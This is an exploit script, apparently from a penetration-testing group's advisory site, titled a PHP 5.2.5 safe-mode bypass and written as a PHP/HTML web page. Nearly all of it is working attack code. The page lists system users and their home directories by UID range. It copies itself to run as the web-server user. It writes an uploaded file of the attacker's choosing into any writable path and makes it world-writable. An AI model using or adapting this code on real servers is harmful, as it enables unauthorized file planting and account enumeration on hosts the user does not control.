EXPLOIT : PHP <= 5.2.5 Safe Mode Bypass

<?php
########################## WwW.BugReport.ir ###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: PHP < 5.2.5 Safe mode Bypass
# Vendor: http://www.php.net/
##################################################################################
?>

<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SAFE MODE BYPASS</title>
<style type="text/css" media="screen">
body {
	font-size: 10px;
	font-family: verdana;
}
INPUT {
	BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<body dir="ltr" alink="#00ff00"  bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000">
<form method="POST" enctype="multipart/form-data" action="?">
Enter The <A href='?info=1' > Target Path </A>:<BR><BR>
<input type="text" name="target" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR>
File Content:<BR><BR>
<input type="file" name="F1" size="50"><BR><BR>
<input type="submit" name="Upload" value="Upload">
</form>
<?php
error_reporting(E_ALL ^ E_NOTICE);

if(isset($_GET['info']) && $_GET['info'] == 1)
{
	if (function_exists('posix_getpwuid'))
	{
		if (isset($_POST['f']) && isset($_POST['l']))
		{
			$f = intval($_POST['f']);
			$l = intval($_POST['l']);
			while ($f < $l)
			{
				$uid = posix_getpwuid($f);
				if ($uid)
				{
					$uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>";
					echo join(":",$uid)."<br>";
				}
				$f++;
			}
		} else
		{
			echo '
			<form method="POST" action="?info=1">Uid  
			FROM : <input type="text" name="f" value="1" size="4">
			TO : <input type="text" name="l" value="1000" size="4">
			<input type="submit" name="Show" value="Show">';
		}
	} else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!");
	die();
}

if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "")
{
	$MyUid   = getmyuid();
	$MyUname = get_current_user();
	if (function_exists('posix_geteuid'))
	{
		$HttpdUid   = posix_geteuid();
		$HttpdInfo  = posix_getpwuid($HttpdUid);
		$HttpdUname = "(".$HttpdInfo['name'].")";
	} else
	{
		$NewScript = @fopen('bypass.php','w+');
		if (!$NewScript)
		{
			die('Make the Current directory Writeable (Chmod 777) and try again');
		} else  $HttpdUid = fileowner('bypass.php');
	}

	if ($MyUid != $HttpdUid)
	{
		echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!";
		echo " We Will create a copy of this Script with httpd User $HttpdUname
		in current directory..."."<BR>";
		if (!$NewScript)
		{
			$NewScript = @fopen('bypass.php','w+');
			if (!$NewScript)
			{
				die('Make the Current directory Writeable (Chmod 777) and try again');
			}
		}
		$Temp = fopen(__FILE__ ,'r');
		while (!feof($Temp))
		{
			$Buffer = fgets($Temp);
			fwrite($NewScript,$Buffer);
		}
		fclose($Temp);
		fclose($NewScript);
		echo "Please Run <A href='bypass.php'> This </A> Script";
		die();	
	}
	
	$TargetPath = trim($_POST['target']);
	$TargetFile = tempnam($TargetPath,"BP");
	if (strstr($TargetFile, $TargetPath) == TRUE)
	{
		echo $TargetFile." Successfully created!<BR>";
	} else die("$TargetPath doesnt exist or is not writeable! choose another path!");

	if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile))
	{
		echo "<BR>$TargetFile is valid, and was successfully uploaded.";
	} else
	{
		die("<BR>$TargetFile Could not upload.");
	}
	chmod($TargetFile , 0777);
}

?>